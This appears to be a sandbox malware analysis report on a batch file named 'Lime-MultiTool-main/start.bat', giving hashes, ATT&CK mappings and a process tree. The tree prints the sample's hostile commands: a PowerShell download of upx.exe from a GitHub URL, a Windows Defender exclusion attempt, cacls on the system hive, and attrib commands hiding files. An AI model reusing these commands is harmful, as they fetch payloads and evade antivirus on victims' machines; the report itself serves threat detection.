d595ab589662812007b211536b921b25367411546fbda83d33fa7ef29e9e7d6c

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
04/12/2024, 12:10

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Lime-MultiTool-main/start.bat
Size

30KB
MD5

288f9aa2144276b6994dbf5a69a8da59
SHA1

b860a86ca3c2b0bcd752c05a15d5bd745dfc506a
SHA256

dd9995205fe2cc6e42086f40327f1aa9a725d2912c7ce2d4cf0839d24baeafb4
SHA512

1b47bd833f192d7d7d014872f5cd8be54168a609cc50200dd9c2f290fae2185b8ef54e1fa47d3ca51fe158b294130c74913789781fedc5e1ab60b9a46e09d15f
SSDEEP

48:92ros7BK7cp3zI8FpIJp/4eai2gF9H2YHwvfol2+:92O4dI8ihXf

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2700	powershell.exe
2644	powershell.exe
1920	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings	rundll32.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2644	powershell.exe
1920	powershell.exe
2700	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
568	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	1920	powershell.exe
Token: SeDebugPrivilege	2700	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
568	AcroRd32.exe
568	AcroRd32.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1168 wrote to memory of 2880	1168	cmd.exe	32
PID 1168 wrote to memory of 2880	1168	cmd.exe	32
PID 1168 wrote to memory of 2880	1168	cmd.exe	32
PID 1168 wrote to memory of 2044	1168	cmd.exe	33
PID 1168 wrote to memory of 2044	1168	cmd.exe	33
PID 1168 wrote to memory of 2044	1168	cmd.exe	33
PID 1168 wrote to memory of 2644	1168	cmd.exe	34
PID 1168 wrote to memory of 2644	1168	cmd.exe	34
PID 1168 wrote to memory of 2644	1168	cmd.exe	34
PID 1168 wrote to memory of 2668	1168	cmd.exe	35
PID 1168 wrote to memory of 2668	1168	cmd.exe	35
PID 1168 wrote to memory of 2668	1168	cmd.exe	35
PID 1168 wrote to memory of 1920	1168	cmd.exe	36
PID 1168 wrote to memory of 1920	1168	cmd.exe	36
PID 1168 wrote to memory of 1920	1168	cmd.exe	36
PID 1168 wrote to memory of 536	1168	cmd.exe	37
PID 1168 wrote to memory of 536	1168	cmd.exe	37
PID 1168 wrote to memory of 536	1168	cmd.exe	37
PID 1168 wrote to memory of 2700	1168	cmd.exe	38
PID 1168 wrote to memory of 2700	1168	cmd.exe	38
PID 1168 wrote to memory of 2700	1168	cmd.exe	38
PID 1168 wrote to memory of 2088	1168	cmd.exe	39
PID 1168 wrote to memory of 2088	1168	cmd.exe	39
PID 1168 wrote to memory of 2088	1168	cmd.exe	39
PID 2044 wrote to memory of 568	2044	rundll32.exe	40
PID 2044 wrote to memory of 568	2044	rundll32.exe	40
PID 2044 wrote to memory of 568	2044	rundll32.exe	40
PID 2044 wrote to memory of 568	2044	rundll32.exe	40

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2088	attrib.exe
536	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\start.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1168
- C:\Windows\system32\mode.com
  mode con: cols=100 lines=30
  2⤵
  PID:2880
- C:\Windows\system32\rundll32.exe
  "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\main.py
  2⤵
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2044
- - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\main.py"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -window hidden -command ""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2644
- C:\Windows\system32\cacls.exe
  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
  2⤵
  PID:2668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1920
- C:\Windows\system32\attrib.exe
  attrib +h "Anon" /s /d
  2⤵
  - Views/modifies file attributes
  PID:536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/sfd11/Nitro-Generator/refs/heads/main/src/utils/upx.exe' -OutFile upx.exe"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2700
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\AppData\Local\Anon\upx.exe" /s /d
  2⤵
  - Views/modifies file attributes
  PID:2088

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
8a6370da84ac13691aab061e21321a80

SHA1
9046da06501020e16d0ba7a33d08bbb1fc6cd1b5

SHA256
f879bc63e86383eae091fd55047d6f336004ac29a176b8c77a250c0c23b6de92

SHA512
7e8fd68e99d6ba0d9e43c205b39206d6a139e3fd651d96655e3fa139901a918e4b1c8d337104440a7b92473544d56a74c86e34370e737d36a9abc68e51e4f16d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2f88a0548655a6e1146e499563136b98

SHA1
9654f3a637bf3b2d6e66aff5df0cbaafd2b234bf

SHA256
3a6cc869304820acf88d296bc85f866915e9e846a486b77e29684e2aee8cfcb5

SHA512
e8ac9a6210b880fb63c8d583993908ec3119cd966e25fa461296fa7d903ff4db397b12eac9fdaa52e6529251f202cff3f085bcf3131576d6c7ec78185c8d9978

Download Submit
memory/1920-35-0x000000001B770000-0x000000001BA52000-memory.dmp

Filesize
2.9MB

Download
memory/1920-36-0x0000000001F60000-0x0000000001F68000-memory.dmp

Filesize
32KB

Download
memory/2644-28-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/2644-29-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download